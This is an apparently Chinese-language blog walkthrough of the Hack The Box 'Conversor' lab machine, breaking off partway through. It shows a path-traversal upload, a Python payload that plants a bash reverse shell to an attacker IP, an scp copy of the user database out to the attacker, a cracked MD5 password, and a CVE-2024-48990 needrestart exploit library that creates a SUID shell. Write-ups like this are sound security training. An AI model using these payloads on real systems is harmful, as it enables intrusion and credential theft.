{"id":328,"date":"2025-10-26T21:37:36","date_gmt":"2025-10-26T13:37:36","guid":{"rendered":"https:\/\/www.misaka19008-lab.icu\/?p=328"},"modified":"2026-01-29T16:19:00","modified_gmt":"2026-01-29T08:19:00","slug":"328","status":"publish","type":"post","link":"https:\/\/www.misaka19008-lab.icu\/index.php\/2025\/10\/26\/328\/","title":{"rendered":"HTB\u9776\u673a Conversor \u6e17\u900f\u6d4b\u8bd5\u8bb0\u5f55"},"content":{"rendered":"<hr \/>\n<h1>\u76ee\u6807\u4fe1\u606f<\/h1>\n<blockquote><p><strong>IP\u5730\u5740\uff1a<\/strong><code><strong>10.129.219.14<\/strong><\/code><strong>\uff08\u975e\u56fa\u5b9aIP\u5730\u5740\uff09<\/strong><\/p><\/blockquote>\n<hr \/>\n<h1>\u4fe1\u606f\u6536\u96c6<\/h1>\n<h2>ICMP\u68c0\u6d4b<\/h2>\n<pre><code class=\"language-plain\">PING 10.129.118.205 (10.129.118.205) 56(84) bytes of data.\n64 bytes from 10.129.118.205: icmp_seq=1 ttl=63 time=319 ms\n64 bytes from 10.129.118.205: icmp_seq=2 ttl=63 time=428 ms\n64 bytes from 10.129.118.205: icmp_seq=3 ttl=63 time=350 ms\n64 bytes from 10.129.118.205: icmp_seq=4 ttl=63 time=372 ms\n\n--- 10.129.118.205 ping statistics ---\n4 packets transmitted, 4 received, 0% packet loss, time 3003ms\nrtt min\/avg\/max\/mdev = 319.404\/367.336\/428.195\/39.803 ms<\/code><\/pre>\n<p>\u653b\u51fb\u673a\u548c\u9776\u673a\u95f4\u7f51\u7edc\u8fde\u63a5\u6b63\u5e38\u3002<\/p>\n<h2>\u9632\u706b\u5899\u68c0\u6d4b<\/h2>\n<pre><code class=\"language-plain\"># Nmap 7.95 scan initiated Sun Oct 26 07:13:00 2025 as: \/usr\/lib\/nmap\/nmap -sF -p- --min-rate 3000 -oN fin_result.txt 10.129.118.205\nNmap scan report for 10.129.118.205\nHost is up (0.33s latency).\nNot shown: 65533 closed tcp ports (reset)\nPORT   STATE         SERVICE\n22\/tcp open|filtered ssh\n80\/tcp open|filtered http\n\n# Nmap done at Sun Oct 26 07:13:35 2025 -- 1 IP address (1 host up) scanned in 34.95 seconds<\/code><\/pre>\n<p>\u9776\u673a\u7591\u4f3c\u5f00\u653e\u4e86<code>22\/tcp<\/code>\u548c<code>80\/tcp<\/code>\u7aef\u53e3\u3002<\/p>\n<h2>\u7f51\u7edc\u7aef\u53e3\u626b\u63cf<\/h2>\n<p><code><strong>TCP<\/strong><\/code><strong>\u7aef\u53e3\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n<pre><code class=\"language-plain\"># Nmap 7.95 scan initiated Sun Oct 26 07:17:15 2025 as: \/usr\/lib\/nmap\/nmap -sT -sV -A -p- --min-rate 3000 -oN tcp_result.txt 10.129.118.205\nNmap scan report for 10.129.118.205\nHost is up (0.29s latency).\nNot shown: 65533 closed tcp ports (conn-refused)\nPORT   STATE SERVICE VERSION\n22\/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   256 01:74:26:39:47:bc:6a:e2:cb:12:8b:71:84:9c:f8:5a (ECDSA)\n|_  256 3a:16:90:dc:74:d8:e3:c4:51:36:e2:08:06:26:17:ee (ED25519)\n80\/tcp open  http    Apache httpd 2.4.52\n|_http-title: Did not follow redirect to http:\/\/conversor.htb\/\n|_http-server-header: Apache\/2.4.52 (Ubuntu)\nDevice type: general purpose|router\nRunning: Linux 4.X|5.X, MikroTik RouterOS 7.X\nOS CPE: cpe:\/o:linux:linux_kernel:4 cpe:\/o:linux:linux_kernel:5 cpe:\/o:mikrotik:routeros:7 cpe:\/o:linux:linux_kernel:5.6.3\nOS details: Linux 4.15 - 5.19, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)\nNetwork Distance: 2 hops\nService Info: Host: conversor.htb; OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nTRACEROUTE (using proto 1\/icmp)\nHOP RTT       ADDRESS\n1   320.14 ms 10.10.14.1\n2   320.15 ms 10.129.118.205\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\n# Nmap done at Sun Oct 26 07:18:24 2025 -- 1 IP address (1 host up) scanned in 69.16 seconds<\/code><\/pre>\n<p><code><strong>UDP<\/strong><\/code><strong>\u7aef\u53e3\u5f00\u653e\u5217\u8868\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n<pre><code class=\"language-plain\"># Nmap 7.95 scan initiated Sun Oct 26 07:39:10 2025 as: \/usr\/lib\/nmap\/nmap -sU -p- --min-rate 3000 -oN udp_ports.txt 10.129.118.205\nWarning: 10.129.118.205 giving up on port because retransmission cap hit (10).\nNmap scan report for 10.129.118.205\nHost is up (0.40s latency).\nAll 65535 scanned ports on 10.129.118.205 are in ignored states.\nNot shown: 65284 open|filtered udp ports (no-response), 251 closed udp ports (port-unreach)\n\n# Nmap done at Sun Oct 26 07:43:24 2025 -- 1 IP address (1 host up) scanned in 254.02 seconds<\/code><\/pre>\n<p><code><strong>UDP<\/strong><\/code><strong>\u7aef\u53e3\u8be6\u7ec6\u4fe1\u606f\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n<pre><code class=\"language-plain\">\uff08\u65e0\uff09<\/code><\/pre>\n<p>\u540c\u65f6\u53d1\u73b0\u9776\u673a\u8fd0\u884c<code>Ubuntu Linux<\/code>\u64cd\u4f5c\u7cfb\u7edf\uff0c\u5f00\u653e\u4e86<code>22\/ssh<\/code>\uff0c<code>80\/http<\/code>\u670d\u52a1\uff0c\u4e3b\u57df\u540d\u4e3a<code>converson.htb<\/code>\u3002<\/p>\n<hr \/>\n<h1>\u670d\u52a1\u63a2\u6d4b<\/h1>\n<h2>SSH\u670d\u52a1\uff0822\u7aef\u53e3\uff09<\/h2>\n<p>\u5c1d\u8bd5\u8fde\u63a5<code>SSH<\/code>\u670d\u52a1\u83b7\u53d6\u767b\u5f55\u65b9\u6cd5\u4fe1\u606f\uff1a<\/p>\n<pre><code class=\"language-shell\">ssh root@converson.htb<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1761437012097-68fdfa69-5a57-47ce-92c5-29db645507b2.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0\u9776\u673a<code>SSH<\/code>\u670d\u52a1\u5141\u8bb8\u4f7f\u7528\u5bc6\u94a5\u548c\u5bc6\u7801\u4e24\u79cd\u65b9\u5f0f\u767b\u5f55\u3002<\/p>\n<h2>HTTP\u670d\u52a1\uff0880\u7aef\u53e3\uff09<\/h2>\n<p>\u6253\u5f00\u4e3b\u9875\uff1a<code>http:\/\/conversor.htb\/<\/code>\uff0c\u53d1\u73b0\u76f4\u63a5\u8df3\u8f6c\u81f3\u767b\u5f55\u9875\u9762<code>\/login<\/code>\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1761447946210-76d90b6a-c1b8-4eb6-ba1a-363eef360ac0.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0\u767b\u5f55\u9875\u4e0a\u5b58\u5728\u94fe\u63a5<code>Register<\/code>\uff0c\u70b9\u51fb\u540e\u8df3\u8f6c\u81f3\u4e86\u6ce8\u518c\u9875\u9762\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1761448006241-3d79b276-1d02-4437-8f57-398e7b899c6e.png\" alt=\"\" \/><\/p>\n<p>\u9664\u6b64\u4e4b\u5916\uff0c\u672a\u5728\u9875\u9762\u4e0a\u53d1\u73b0\u4efb\u4f55\u4fe1\u606f\u3002\u5c1d\u8bd5\u626b\u63cf\u76ee\u5f55\uff1a<\/p>\n<pre><code class=\"language-shell\">dirsearch -u http:\/\/conversor.htb -x 400,404 -t 70 -e php,py,pyc,js,html,txt,zip,tar.gz,xml,json.pdf,pcap,config -w \/usr\/share\/wordlists\/wfuzz\/general\/megabeast.txt<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1761448121060-2c1ff58b-6a7a-44c2-ac24-764025441298.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0\u7ad9\u70b9\u8fd8\u5b58\u5728\u4e00\u4e2a<code>API<\/code>\u63a5\u53e3<code>\/convert<\/code>\u548c\u8bf4\u660e\u9875\u9762<code>\/about<\/code>\u3002\u9996\u5148\u8bbf\u95ee<code>http:\/\/conversor.htb\/about<\/code>\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1761448236516-24b2cbf9-0a1b-41ad-bb89-7cdf814250ad.png\" alt=\"\" \/><\/p>\n<p>\u6210\u529f\u53d1\u73b0\u9875\u9762\u4e0a\u7559\u4e0b\u4e86\u4e09\u540d\u5f00\u53d1\u4eba\u5458\u7684\u4e2a\u4eba\u4fe1\u606f\uff0c\u4ee5\u53ca\u7ad9\u70b9\u6e90\u4ee3\u7801\u4e0b\u8f7d\u6309\u94ae<code>Download Source Code<\/code>\uff08\u5b9e\u9645\u6307\u5411\u94fe\u63a5<code>http:\/\/conversor.htb\/static\/source_code.tar.gz<\/code>\uff09\u3002\u76f4\u63a5\u70b9\u51fb\u4e0b\u8f7d\u538b\u7f29\u5305\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1761457135698-b3641c98-2db9-48d4-9265-9087b8298313.png\" alt=\"\" \/><\/p>\n<p>\u6210\u529f\u83b7\u53d6\u7ad9\u70b9\u6e90\u4ee3\u7801\uff01<\/p>\n<hr \/>\n<h1>\u6e17\u900f\u6d4b\u8bd5<\/h1>\n<h2>Python\u7ad9\u70b9\u6e90\u4ee3\u7801\u5ba1\u8ba1<\/h2>\n<p>\u5728\u670d\u52a1\u63a2\u6d4b\u8fc7\u7a0b\u4e2d\uff0c\u6211\u4eec\u5df2\u7ecf\u6210\u529f\u4e0b\u8f7d\u4e86\u9776\u673a\u7ad9\u70b9\u7684\u6e90\u4ee3\u7801\uff0c\u73b0\u5728\u76f4\u63a5\u89e3\u538b\u538b\u7f29\u5305\u8fdb\u884c\u5ba1\u8ba1\u3002<\/p>\n<p>\u9996\u5148\u67e5\u770b\u8bf4\u660e\u6587\u6863<code>install.md<\/code>\uff1a<\/p>\n<pre><code class=\"language-plain\">To deploy Conversor, we can extract the compressed file:\n\n\"\"\"\ntar -xvf source_code.tar.gz\n\"\"\"\n\nWe install flask:\n\n\"\"\"\npip3 install flask\n\"\"\"\n\nWe can run the app.py file:\n\n\"\"\"\npython3 app.py\n\"\"\"\n\nYou can also run it with Apache using the app.wsgi file.\n\nIf you want to run Python scripts (for example, our server deletes all files older than 60 minutes to avoid system overload), you can add the following line to your \/etc\/crontab.\n\n\"\"\"\n* * * * * www-data for f in \/var\/www\/conversor.htb\/scripts\/*.py; do python3 \"$f\"; done\n\"\"\"<\/code><\/pre>\n<p>\u6587\u6863\u63cf\u8ff0\u79f0\uff0c\u7ad9\u70b9\u670d\u52a1\u5668\u5b58\u5728\u6bcf\u4e00\u4e2a\u5c0f\u65f6\u5220\u9664\u6307\u5b9a\u4f4d\u7f6e\u6587\u4ef6\u7684\u8ba1\u5212\u4efb\u52a1\uff0c\u540c\u65f6\u8fd8\u5728\u672b\u5c3e\u5904\u7ed9\u51fa\u4e86\u8ba1\u5212\u4efb\u52a1\u914d\u7f6e\u793a\u4f8b\uff0c\u8be5\u793a\u4f8b\u610f\u4e3a\u6bcf\u4e00\u79d2\u5c06<code>\/var\/www\/conversor.htb\/scripts\/<\/code>\u76ee\u5f55\u4e0b\u7684<code>Python<\/code>\u811a\u672c\u5168\u90e8\u6267\u884c\u4e00\u904d\u3002<\/p>\n<p>\u6000\u7591\u8be5\u8ba1\u5212\u4efb\u52a1\u914d\u7f6e\u771f\u5b9e\u5b58\u5728\u4e8e\u7ad9\u70b9\u670d\u52a1\u5668\u4e0a\uff0c\u7ee7\u7eed\u5ba1\u8ba1\u4e3b\u7a0b\u5e8f<code>app.py<\/code>\uff1a<\/p>\n<pre><code class=\"language-python\">from flask import Flask, render_template, request, redirect, url_for, session, send_from_directory\nimport os, sqlite3, hashlib, uuid\n\napp = Flask(__name__)\napp.secret_key = 'Changemeplease'\n\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\nDB_PATH = '\/var\/www\/conversor.htb\/instance\/users.db'\nUPLOAD_FOLDER = os.path.join(BASE_DIR, 'uploads')\nos.makedirs(UPLOAD_FOLDER, exist_ok=True)\n\ndef init_db():\n    os.makedirs(os.path.join(BASE_DIR, 'instance'), exist_ok=True)\n    conn = sqlite3.connect(DB_PATH)\n    c = conn.cursor()\n    c.execute('''CREATE TABLE IF NOT EXISTS users (\n        id INTEGER PRIMARY KEY AUTOINCREMENT,\n        username TEXT UNIQUE,\n        password TEXT\n    )''')\n    c.execute('''CREATE TABLE IF NOT EXISTS files (\n        id TEXT PRIMARY KEY,\n        user_id INTEGER,\n        filename TEXT,\n        FOREIGN KEY(user_id) REFERENCES users(id)\n    )''')\n    conn.commit()\n    conn.close()\n\ninit_db()\n\ndef get_db():\n    conn = sqlite3.connect(DB_PATH)\n    conn.row_factory = sqlite3.Row\n    return conn\n\n@app.route('\/')\ndef index():\n    if 'user_id' not in session:\n        return redirect(url_for('login'))\n    conn = get_db()\n    cur = conn.cursor()\n    cur.execute(\"SELECT * FROM files WHERE user_id=?\", (session['user_id'],))\n    files = cur.fetchall()\n    conn.close()\n    return render_template('index.html', files=files)\n\n@app.route('\/register', methods=['GET','POST'])\ndef register():\n    if request.method == 'POST':\n        username = request.form['username']\n        password = hashlib.md5(request.form['password'].encode()).hexdigest()\n        conn = get_db()\n        try:\n            conn.execute(\"INSERT INTO users (username,password) VALUES (?,?)\", (username,password))\n            conn.commit()\n            conn.close()\n            return redirect(url_for('login'))\n        except sqlite3.IntegrityError:\n            conn.close()\n            return \"Username already exists\"\n    return render_template('register.html')\n@app.route('\/logout')\ndef logout():\n    session.clear()\n    return redirect(url_for('login'))\n\n@app.route('\/about')\ndef about():\n return render_template('about.html')\n\n@app.route('\/login', methods=['GET','POST'])\ndef login():\n    if request.method == 'POST':\n        username = request.form['username']\n        password = hashlib.md5(request.form['password'].encode()).hexdigest()\n        conn = get_db()\n        cur = conn.cursor()\n        cur.execute(\"SELECT * FROM users WHERE username=? AND password=?\", (username,password))\n        user = cur.fetchone()\n        conn.close()\n        if user:\n            session['user_id'] = user['id']\n            session['username'] = username\n            return redirect(url_for('index'))\n        else:\n            return \"Invalid credentials\"\n    return render_template('login.html')\n\n@app.route('\/convert', methods=['POST'])\ndef convert():\n    if 'user_id' not in session:\n        return redirect(url_for('login'))\n    xml_file = request.files['xml_file']\n    xslt_file = request.files['xslt_file']\n    from lxml import etree\n    xml_path = os.path.join(UPLOAD_FOLDER, xml_file.filename)\n    xslt_path = os.path.join(UPLOAD_FOLDER, xslt_file.filename)\n    xml_file.save(xml_path)\n    xslt_file.save(xslt_path)\n    try:\n        parser = etree.XMLParser(resolve_entities=False, no_network=True, dtd_validation=False, load_dtd=False)\n        xml_tree = etree.parse(xml_path, parser)\n        xslt_tree = etree.parse(xslt_path)\n        transform = etree.XSLT(xslt_tree)\n        result_tree = transform(xml_tree)\n        result_html = str(result_tree)\n        file_id = str(uuid.uuid4())\n        filename = f\"{file_id}.html\"\n        html_path = os.path.join(UPLOAD_FOLDER, filename)\n        with open(html_path, \"w\") as f:\n            f.write(result_html)\n        conn = get_db()\n        conn.execute(\"INSERT INTO files (id,user_id,filename) VALUES (?,?,?)\", (file_id, session['user_id'], filename))\n        conn.commit()\n        conn.close()\n        return redirect(url_for('index'))\n    except Exception as e:\n        return f\"Error: {e}\"\n\n@app.route('\/view\/&lt;file_id&gt;')\ndef view_file(file_id):\n    if 'user_id' not in session:\n        return redirect(url_for('login'))\n    conn = get_db()\n    cur = conn.cursor()\n    cur.execute(\"SELECT * FROM files WHERE id=? AND user_id=?\", (file_id, session['user_id']))\n    file = cur.fetchone()\n    conn.close()\n    if file:\n        return send_from_directory(UPLOAD_FOLDER, file['filename'])\n    return \"File not found\"<\/code><\/pre>\n<p>\u901a\u8bfb\u7ad9\u70b9\u4ee3\u7801\uff0c\u53d1\u73b0<code>API<\/code>\u63a5\u53e3<code>\/convert<\/code>\u5b58\u5728\u4efb\u610f\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e\u3002\u5728<code>convert()<\/code>\u65b9\u6cd5\u5f00\u5934<code>9<\/code>\u884c\uff0c\u5373\u7a0b\u5e8f\u7b2c<code>94 - 102<\/code>\u884c\u5904\uff0c\u63a5\u53e3\u672a\u5bf9\u4e0a\u4f20\u6587\u4ef6\u540d\u79f0\u8fdb\u884c\u5371\u9669\u5b57\u7b26\u68c0\u67e5\uff0c\u800c\u4e14\u5728\u8c03\u7528<code>lxml<\/code>\u7c7b\u5e93\u76f8\u5173\u65b9\u6cd5\u5bf9\u6587\u4ef6\u5185\u5bb9\u8fdb\u884c\u683c\u5f0f\u9a8c\u8bc1\u524d\uff0c\u5c31\u4f7f\u7528<code>os.path.join()<\/code>\u65b9\u6cd5\u5c06\u4e0a\u4f20\u76ee\u5f55\u6587\u672c\u53d8\u91cf<code>UPLOAD_PATH<\/code>\u548c\u539f\u59cb\u4e0a\u4f20\u6587\u4ef6\u540d\u62fc\u63a5\u5728\u4e86\u4e00\u8d77\uff0c\u5bfc\u81f4\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u76ee\u5f55\u7a7f\u8d8a\u5b57\u7b26<code>..\/<\/code>\u8fdb\u884c\u4efb\u610f\u6587\u4ef6\u8de8\u76ee\u5f55\u4e0a\u4f20\u653b\u51fb\u3002<\/p>\n<h2>\u4efb\u610f\u6587\u4ef6\u4e0a\u4f20\u914d\u5408\u8ba1\u5212\u4efb\u52a1\u6cc4\u9732\u5229\u7528<\/h2>\n<p>\u901a\u8fc7\u6e90\u4ee3\u7801\u5ba1\u8ba1\uff0c\u6211\u4eec\u5df2\u7ecf\u53d1\u73b0\u7ad9\u70b9<code>XML<\/code>\u6587\u4ef6\u683c\u5f0f\u8f6c\u6362\u529f\u80fd\u5b58\u5728\u4e25\u91cd\u8de8\u76ee\u5f55\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e\uff0c\u4ee5\u53ca\u9776\u673a\u5f88\u53ef\u80fd\u5b58\u5728\u5b9a\u65f6\u6267\u884c<code>\/var\/www\/conversor.htb\/scripts\/<\/code>\u76ee\u5f55\u4e0b<code>Python<\/code>\u811a\u672c\u6587\u4ef6\u7684\u60c5\u51b5\uff0c\u73b0\u5728\u5c1d\u8bd5\u6ce8\u518c\u8d26\u53f7\uff0c\u4e0a\u4f20\u53cd\u5f39<code>Shell<\/code>\u811a\u672c\u7a0b\u5e8f\u8fdb\u884c\u5229\u7528\u3002<\/p>\n<p>\u9996\u5148\u8bbf\u95ee\u7f51\u5740<code>http:\/\/conversor.htb\/register<\/code>\uff0c\u6ce8\u518c\u65b0\u8d26\u53f7\uff0c\u968f\u540e\u767b\u5f55\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1761474526192-26f85f32-9ba5-4b13-a4a1-f3fba75ba2be.png\" alt=\"\" \/><\/p>\n<p>\u63a5\u7740\u7f16\u5199\u6dfb\u52a0\u53cd\u5f39<code>Shell<\/code>\u8ba1\u5212\u4efb\u52a1\u7684\u6076\u610f<code>Python<\/code>\u811a\u672c\uff1a<\/p>\n<pre><code class=\"language-python\">#!\/usr\/bin\/python3\nimport os\nos.system('''echo \"*\/1 * * * * \/bin\/bash -c 'bash -i &gt;&amp; \/dev\/tcp\/10.10.14.3\/443 0&gt;&amp;1'\" | crontab''')<\/code><\/pre>\n<p>\u968f\u540e\u9009\u62e9\u8be5\u811a\u672c\u4f5c\u4e3a<code>XML<\/code>\u548c<code>XSLT<\/code>\u6587\u4ef6\uff0c\u6253\u5f00<code>BurpSuite<\/code>\u4ee3\u7406\uff0c\u70b9\u51fb<code>Convert<\/code>\u6309\u94ae\u4e0a\u4f20\uff0c\u6355\u83b7\u7f51\u7edc\u8bf7\u6c42\u5305\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1761474962175-03cdd5cd-4d84-4f63-8f50-4992090ffddc.png\" alt=\"\" \/><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1761475589574-763b7854-52cc-46ea-9a3f-1b8cc11d1870.png\" alt=\"\" \/><\/p>\n<p>\u5c06\u8bf7\u6c42\u5305\u53d1\u9001\u5230<code>Repeater<\/code>\uff0c\u7f16\u8f91\u4e24\u4e2a<code>filename<\/code>\u6587\u4ef6\u540d\u53c2\u6570\uff0c\u4f7f\u6587\u4ef6\u5b9e\u9645\u4e0a\u4f20\u8def\u5f84\u53d8\u4e3a<code>\/var\/www\/conversor.htb\/scripts\/misaka19008.py<\/code>\uff1a<\/p>\n<pre><code class=\"language-plain\">..\/..\/..\/..\/..\/..\/..\/var\/www\/conversor.htb\/scripts\/misaka19008.py<\/code><\/pre>\n<p>\u968f\u540e\u5728\u672c\u5730\u542f\u52a8<code>netcat<\/code>\u76d1\u542c\uff1a<\/p>\n<pre><code class=\"language-shell\">rlwrap nc -l -p 443 -s 10.10.14.3<\/code><\/pre>\n<p>\u63a5\u7740\u53d1\u9001\u8bf7\u6c42\u5305\uff0c\u7136\u540e\u7b49\u5f85\u4e00\u4f1a\u513f\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1761475729298-38b5232f-cba7-4486-86c9-5b89777c53d8.png\" alt=\"\" \/><\/p>\n<p><strong>\u6210\u529f\u6536\u5230\u53cd\u5f39Shell\uff01\uff01<\/strong><\/p>\n<hr \/>\n<h1>\u6743\u9650\u63d0\u5347<\/h1>\n<h2>\u7834\u89e3SQLite\u5185\u7528\u6237\u5bc6\u7801<\/h2>\n<p>\u8fdb\u5165\u7cfb\u7edf\u540e\uff0c\u53d1\u73b0\u7ad9\u70b9\u6570\u636e\u5e93\u8def\u5f84\u4e3a<code>\/var\/www\/conversor.htb\/instance\/users.db<\/code>\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1761476271611-e99a1115-ea8d-42a4-ae87-31f3269d4aaf.png\" alt=\"\" \/><\/p>\n<p>\u76f4\u63a5\u4e0b\u8f7d<code>SQLite<\/code>\u6570\u636e\u5e93\u5230\u672c\u5730\uff1a<\/p>\n<pre><code class=\"language-python\">scp -P 22222 \/var\/www\/conversor.htb\/instance\/users.db misaka19008@10.10.14.3:\/home\/misaka19008\/Documents\/pentest_notes\/conversor\/users.db<\/code><\/pre>\n<p>\u968f\u540e\u6253\u5f00\u6570\u636e\u5e93<code>users<\/code>\u8868\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1761476389835-750cab92-7e7f-4409-a5f7-87fb1d5a17bf.png\" alt=\"\" \/><\/p>\n<p>\u6210\u529f\u53d1\u73b0\u7ad9\u70b9\u5185\u5b58\u5728<code>fismathack<\/code>\u7528\u6237\u54c8\u5e0c\u4e3a<code>5b5c3ac3a1c897c94caad48e6c71fdec<\/code>\uff0c\u548c\u64cd\u4f5c\u7cfb\u7edf\u7528\u6237\u91cd\u540d\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1761476462749-b9dcc15e-7c1b-422c-add6-dd5523dd9acc.png\" alt=\"\" \/><\/p>\n<p>\u76f4\u63a5\u4f7f\u7528<code>hashcat<\/code>\u5de5\u5177\u7834\u89e3\uff1a<\/p>\n<pre><code class=\"language-shell\">hashcat -m 0 -a 0 \"5b5c3ac3a1c897c94caad48e6c71fdec\" \/usr\/share\/wordlists\/rockyou.txt --force<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1761476775386-e480ae29-cbbc-4f26-8903-613041589ae3.png\" alt=\"\" \/><\/p>\n<p>\u6210\u529f\u53d1\u73b0\u7cfb\u7edf\u7528\u6237\u51ed\u636e\uff1a<\/p>\n<ul>\n<li>\u7528\u6237\u540d\uff1a<code>fismathack<\/code><\/li>\n<li>\u5bc6\u7801\uff1a<code>Keepmesafeandwarm<\/code><\/li>\n<\/ul>\n<p>\u76f4\u63a5\u4f7f\u7528<code>SSH<\/code>\u767b\u5f55\uff1a<\/p>\n<pre><code class=\"language-shell\">ssh fismathack@conversor.htb<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1761476923148-bb635eb0-05e9-4198-98c7-ddeb459497da.png\" alt=\"\" \/><\/p>\n<p><strong>\u6210\u529f\u79fb\u52a8\u81f3\u8f83\u9ad8\u6743\u9650\u7528\u6237\uff01\uff01<\/strong><\/p>\n<h2>Sudo\u7a0b\u5e8f\u6f0f\u6d1e\u5229\u7528\u63d0\u6743<\/h2>\n<p>\u767b\u5f55<code>fismathack<\/code>\u7528\u6237\u540e\uff0c\u5c1d\u8bd5\u4f7f\u7528<code>sudo -l<\/code> \u547d\u4ee4\u67e5\u770b\u5f53\u524d\u7528\u6237<code>Sudo<\/code>\u6743\u9650\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1761482710067-c0ccedda-b398-44fc-9916-885d1d70093f.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0\u5f53\u524d\u7528\u6237\u53ef\u4ee5<code>root<\/code>\u7528\u6237\u8eab\u4efd\u514d\u5bc6\u8fd0\u884c<code>\/usr\/sbin\/needrestart<\/code>\u7a0b\u5e8f\uff0c\u7ecf\u8054\u7f51\u67e5\u8be2\uff0c\u53d1\u73b0\u8be5\u7a0b\u5e8f\u7684\u529f\u80fd\u4e3a\u7cfb\u7edf\u8fdb\u884c<code>APT<\/code>\u66f4\u65b0\u540e\u68c0\u67e5\u9700\u8981\u8fdb\u884c\u91cd\u65b0\u542f\u52a8\u7684\u670d\u52a1\u3002\u68c0\u67e5\u8be5\u7a0b\u5e8f\u7684\u7248\u672c\uff1a<\/p>\n<pre><code class=\"language-shell\">needrestart -v<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1761482849626-c8926de7-4310-4f0a-842f-82b922525d41.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0\u7248\u672c\u4e3a<code>needrestart v3.7<\/code>\uff0c\u8054\u7f51\u67e5\u8be2\u8be5\u7a0b\u5e8f\u6f0f\u6d1e\uff1a<a href=\"https:\/\/xz.aliyun.com\/news\/15879\" target=\"_blank\"  rel=\"nofollow\" >Ubuntu needrestart\u6743\u9650\u63d0\u5347\u6f0f\u6d1e(CVE-2024-48990)\u6f0f\u6d1e\u5206\u6790-\u5148\u77e5\u793e\u533a<\/a><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1761483029724-6500104d-8971-4263-9f9b-6a80d2f022eb.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0<code>needrestart v3.7<\/code>\u5b58\u5728\u6743\u9650\u63d0\u5347\u6f0f\u6d1e\uff0c\u7f16\u53f7\u4e3a<code>CVE-2024-48990<\/code>\u3002<\/p>\n<p>\u76f4\u63a5\u6309\u7167\u6587\u7ae0\u63cf\u8ff0\u8fdb\u884c\u6f0f\u6d1e\u5229\u7528\u3002\u9996\u5148\u7f16\u5199\u6076\u610f<code>Linux<\/code>\u6269\u5c55\u652f\u6301\u5e93\u6e90\u4ee3\u7801<code>__init__.c<\/code>\uff1a<\/p>\n<pre><code class=\"language-c\">#include &lt;stdio.h&gt;\n#include &lt;stdlib.h&gt;\n#include &lt;sys\/types.h&gt;\n#include &lt;unistd.h&gt;\n\nstatic void a() __attribute__((constructor));\n\nvoid a() {\n setuid(0);\n setgid(0);\n const char *shell = \"cp \/bin\/sh \/tmp\/poc; chmod u+s \/tmp\/poc &amp;\";\n system(shell);\n}<\/code><\/pre>\n<p>\u968f\u540e\u5c06\u5176\u5728\u653b\u51fb\u673a\u4e0a\u9759\u6001\u7f16\u8bd1\uff0c\u5e76\u4e0a\u4f20\u81f3<code>\/home\/fismathack\/importlib\/<\/code>\u76ee\u5f55\u4e0b\uff08\u5982\u76ee\u5f55\u4e0d\u5b58\u5728\u5219\u521b\u5efa\uff09\uff1a<\/p>\n<pre><code class=\"language-shell\">gcc -shared -fPIC -o __init__.so __init__.c\nscp -P 22 __init__.so fismathack@10.129.120.57:\/home\/fismathack\/importlib\/__init__.so<\/code><\/pre>\n<p>\u63a5\u7740\u5728\u9776\u673a\u4e0a\u7f16\u5199\u89e6\u53d1<code>SUID Bash<\/code>\u7684<code>Python<\/code>\u811a\u672c<code>exp.py<\/code>\uff1a<\/p>\n<pre><code class=\"language-python\">#!\/usr\/bin\/python3\nimport os\nimport time\n\nif os.path.exists(\"\/tmp\/poc\"):\n    os.remove('\/tmp\/poc')\nwhile 